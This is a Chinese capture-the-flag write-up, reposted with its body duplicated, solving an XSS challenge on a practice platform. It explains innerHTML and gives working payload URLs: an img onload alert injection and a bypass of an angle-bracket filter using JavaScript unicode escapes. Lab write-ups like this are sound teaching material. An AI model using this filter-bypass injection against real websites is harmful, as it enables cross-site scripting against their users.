CTF/CTF练习平台-XSS【xss注入及js unicode编码及innerHTML】
2017-08-31 21:53
507 查看
原题内容:
http://103.238.227.13:10089/
Flag格式:Flag:xxxxxxxxxxxxxxxxxxxxxxxx
题目有点坑啊,注入点都没说明,去群里问的,这题注入点为id(get方式),id的值会进行替换后进入s
补充了这个,好了,继续做题
右键源码
<script>
var s="";
document.getElementById('s').innerHTML = s;
</script>
结合上述补充,和题目要求
1、请注入一段XSS代码,获取Flag值
2、必须包含alert(_key_),_key_会自动被替换
首先,解释下源码中发现的代码的意思,下面举个例子说明下innerHTML
<a id="baidu"><strong>百度</strong></a>
document.getElementById("baidu") 获得 a 这个元素
document.getElementById("baidu") .innerHTML 获得 a 这个元素内的HTML代码(即<strong>百度</strong>)
document.getElementById("baidu") .innerHTML = "<em>谷歌</em>"
设置 a 这个元素内的HTML代码,
设置后<strong>百度</strong>
就变为<em>谷歌</em>
搜索document.getElementById('s').innerHTML时发现一个很有趣的问题
如果字符串中拼接的 HTML 标签中有 script 标签,那么该段脚本是无法执行的,这并不是 bug,而是 w3c 的文档规定的
这里推荐一个博客,大家可以前去学习一下
simplify the life by 韩子迟
我们需要的是可以从注入点id进入的方法,所以这里参考其博客的img标签方法,于是构造
http://103.238.227.13:10089/?id=<img%20src=1%20onload=alert(_key_)/>很遗憾,存在回显
这说明,存在xss filter,我们的传参字符串中存在被屏蔽的词
一般最可能的是alert,但这里题目要求存在alert,顾考虑第二可能点<>
进行了两组尝试,代码和回显如下:
链接
http://103.238.227.13:10089/?id=\%3Cimg%20src=1%20onload=alert(_key_)/\%3E 回显
<img src=1 onload=alert(_key_)/>
链接 http://103.238.227.13:10089/?id=\\%3Cimg%20src=1%20onload=alert(_key_)/\\%3E
回显
\<img src=1 onload=alert(_key_)/\>
很明显了,反义符号对<>不起作用,对本身起作用,这说明阻挡点是<>
注意页面编码utf-8
id传入代码会在s中运行
考虑将<>进行unicode编码,这样当代码被替换进去运行时,utf-8编码又会将其变回来
具体表参考博客
unicode字符集特殊符号对应html/js/css符号
接下来就没问题了
构造链接
http://103.238.227.13:10089/?id=\u003cimg%20src=1%20onload=alert(_key_)/\u003e
查看源代码,可看到_key_已经被替换成答案
var s="\\<img src=1 onload=alert(_key_)/\\>"; document.getElementById('s').innerHTML = s;
http://103.238.227.13:10089/
Flag格式:Flag:xxxxxxxxxxxxxxxxxxxxxxxx
题目有点坑啊,注入点都没说明,去群里问的,这题注入点为id(get方式),id的值会进行替换后进入s
补充了这个,好了,继续做题
右键源码
<script>
var s="";
document.getElementById('s').innerHTML = s;
</script>
结合上述补充,和题目要求
1、请注入一段XSS代码,获取Flag值
2、必须包含alert(_key_),_key_会自动被替换
首先,解释下源码中发现的代码的意思,下面举个例子说明下innerHTML
<a id="baidu"><strong>百度</strong></a>
document.getElementById("baidu") 获得 a 这个元素
document.getElementById("baidu") .innerHTML 获得 a 这个元素内的HTML代码(即<strong>百度</strong>)
document.getElementById("baidu") .innerHTML = "<em>谷歌</em>"
设置 a 这个元素内的HTML代码,
设置后<strong>百度</strong>
就变为<em>谷歌</em>
搜索document.getElementById('s').innerHTML时发现一个很有趣的问题
如果字符串中拼接的 HTML 标签中有 script 标签,那么该段脚本是无法执行的,这并不是 bug,而是 w3c 的文档规定的
这里推荐一个博客,大家可以前去学习一下
simplify the life by 韩子迟
我们需要的是可以从注入点id进入的方法,所以这里参考其博客的img标签方法,于是构造
http://103.238.227.13:10089/?id=<img%20src=1%20onload=alert(_key_)/>很遗憾,存在回显
这说明,存在xss filter,我们的传参字符串中存在被屏蔽的词
一般最可能的是alert,但这里题目要求存在alert,顾考虑第二可能点<>
进行了两组尝试,代码和回显如下:
链接
http://103.238.227.13:10089/?id=\%3Cimg%20src=1%20onload=alert(_key_)/\%3E 回显
<img src=1 onload=alert(_key_)/>
链接 http://103.238.227.13:10089/?id=\\%3Cimg%20src=1%20onload=alert(_key_)/\\%3E
回显
\<img src=1 onload=alert(_key_)/\>
很明显了,反义符号对<>不起作用,对本身起作用,这说明阻挡点是<>
注意页面编码utf-8
id传入代码会在s中运行
考虑将<>进行unicode编码,这样当代码被替换进去运行时,utf-8编码又会将其变回来
具体表参考博客
unicode字符集特殊符号对应html/js/css符号
接下来就没问题了
构造链接
http://103.238.227.13:10089/?id=\u003cimg%20src=1%20onload=alert(_key_)/\u003e
查看源代码,可看到_key_已经被替换成答案
var s="\\<img src=1 onload=alert(_key_)/\\>"; document.getElementById('s').innerHTML = s;
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- CTF/CTF练习平台 随机数运算验证【细节js文件查看】
- CTF/CTF练习平台 --SQL注入测试【sql宽字节注入与#,%23】
- BugKuCTF(CTF-练习平台)——Crypto-来自宇宙的信号
- java如何得到字符的unicode编码,对应js的charCodeAt()方法
- CTF/CTF练习平台-本地包含【eval函数闭合及代码段的理解】
- windows API练习(2)多字节编码转UNICODE编码
- bugku CTF练习平台writeup
- CTF/CTF练习平台-前女友【弱类型】
- bugku CTF-练习平台 部分writeup
- BugKuCTF(CTF-练习平台)——Crypto-奇怪的密码
- BugKuCTF(CTF-练习平台)——Crypto-ok
- 对于Unicode编码在js中和html中
- BugKuCTF(CTF-练习平台)——WEB-矛盾
- unicode编码过php的magic_quotes_gpc设置为on的mysql注入与文件写入(待测试)
- js字符串与Unicode编码互相转换
- C# JS汉字和Unicode编码互转
- BugKuCTF(CTF-练习平台)——WEB-计算题
- CTF/CTF练习平台-flag在index里【php://filter的利用】
- js小记 unicode 编码解析
- 听说备份是个好习惯(CTF-练习平台)